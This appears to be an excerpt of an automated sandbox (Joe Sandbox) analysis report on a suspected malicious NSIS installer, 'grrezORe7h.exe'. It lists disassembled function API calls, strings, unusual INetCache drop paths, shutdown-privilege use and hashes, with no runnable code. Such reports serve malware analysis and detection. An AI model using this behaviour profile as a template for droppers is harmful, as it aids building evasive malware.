lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 00403651
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
CopyFileW.KERNEL32(C:\Users\user\Desktop\grrezORe7h.exe,0042AA28,00000001), ref: 004036DB
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
AdjustTokenPrivileges.ADVAPI32 ref: 00403776
ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
ExitProcess.KERNEL32 ref: 004037BE

Strings

Low, xrefs: 004034F8
Error launching installer, xrefs: 004035AD
UXTHEME, xrefs: 004032E7
C:\Users\user\AppData\Local\Temp\, xrefs: 004034BA, 004034BF, 004034D5, 004034E1, 004034F0, 004034FD, 00403509, 00403511, 00403628, 00403639, 00403644, 00403650, 0040365D, 0040366C, 0040371D
\Temp, xrefs: 004034DC
"C:\Users\user\Desktop\grrezORe7h.exe", xrefs: 00403356, 0040335C, 00403553
~nsu, xrefs: 00403623
1033, xrefs: 00403526
TEMP, xrefs: 0040350A
.tmp, xrefs: 0040363F
C:\Users\user\Desktop, xrefs: 0040364A, 0040364F, 0040367C
SETUPAPI, xrefs: 004032FB
USERENV, xrefs: 004032F1
NSIS Error, xrefs: 00403341
TMP, xrefs: 00403512
C:\Users\user\Desktop\grrezORe7h.exe, xrefs: 004036D6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets, xrefs: 004035D3
SeShutdownPrivilege, xrefs: 0040374D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 004034A8, 004035C8, 00403673, 0040367D

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\grrezORe7h.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-3216160104
Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B48
GetDlgItem.USER32(?,00000408), ref: 00404B53
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
LoadBitmapW.USER32(0000006E), ref: 00404BB0
SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
DeleteObject.GDI32(00000000), ref: 00404C26
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
GetWindowLongW.USER32(?,000000F0), ref: 00404D61
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
ShowWindow.USER32(?,00000005), ref: 00404D80
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
ImageList_Destroy.COMCTL32(?), ref: 00404F50
GlobalFree.KERNEL32(?), ref: 00404F60
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
SendMessageW.USER32(?,00001102,?,?), ref: 00405082
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
ShowWindow.USER32(?,00000000), ref: 004050FF
GetDlgItem.USER32(?,000003FE), ref: 0040510A
ShowWindow.USER32(00000000), ref: 00405111

Strings

, xrefs: 004050E9
N, xrefs: 00404DBB
M, xrefs: 00404CDA

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
CoTaskMemFree.OLE32(?), ref: 00406220
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E

Strings

Call, xrefs: 004060A1, 00406181, 004061A2, 004061B7, 004061CA, 004061E6, 00406211, 00406243, 00406249, 00406263, 00406277, 00406297, 0040629D, 004062A9, 004062DC
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 0040586F
lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058B7
lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058DA
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058E0
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004058F0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
FindClose.KERNEL32(00000000), ref: 0040599F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
\*.*, xrefs: 004058B1
"C:\Users\user\Desktop\grrezORe7h.exe", xrefs: 0040584F

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2617296150
Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets
API String ID: 542301482-3638503147
Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54

Function 00406398 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
FindClose.KERNEL32(00000000), ref: 004063AF

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
ShowWindow.USER32(?), ref: 00403C9A
DestroyWindow.USER32 ref: 00403CAE
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
GetDlgItem.USER32(?,?), ref: 00403CEB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
IsWindowEnabled.USER32(00000000), ref: 00403D06
GetDlgItem.USER32(?,00000001), ref: 00403DB4
GetDlgItem.USER32(?,00000002), ref: 00403DBE
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
GetDlgItem.USER32(?,00000003), ref: 00403ECF
ShowWindow.USER32(00000000,?), ref: 00403EF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
EnableWindow.USER32(?,?), ref: 00403F1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
EnableMenuItem.USER32(00000000), ref: 00403F3A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
ShowWindow.USER32(?,0000000A), ref: 004040D6

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 004038B8

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 0040391F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
GetFileAttributesW.KERNEL32(Call), ref: 004039BD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
RegisterClassW.USER32(00433EA0), ref: 00403A43
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
ShowWindow.USER32(00000005,00000000), ref: 00403AC6
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
RegisterClassW.USER32(00433EA0), ref: 00403B08
DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004038D2
C:\Users\user\AppData\Local\Temp\, xrefs: 004038A3
RichEd20, xrefs: 00403ACC
"C:\Users\user\Desktop\grrezORe7h.exe", xrefs: 004038A1
Call, xrefs: 00403966, 0040396F, 0040397D, 004039CC, 004039D2
1033, xrefs: 004038BE, 0040391A
.DEFAULT\Control Panel\International, xrefs: 0040390A
RichEd32, xrefs: 00403ADA
RichEdit20W, xrefs: 00403AEA, 00403AF0
.exe, xrefs: 004039AC
_Nb, xrefs: 00403A22, 00403A8A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 0040392E, 00403936, 004039D9, 004039DF, 004039EF
RichEdit, xrefs: 00403AF9

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-253723719
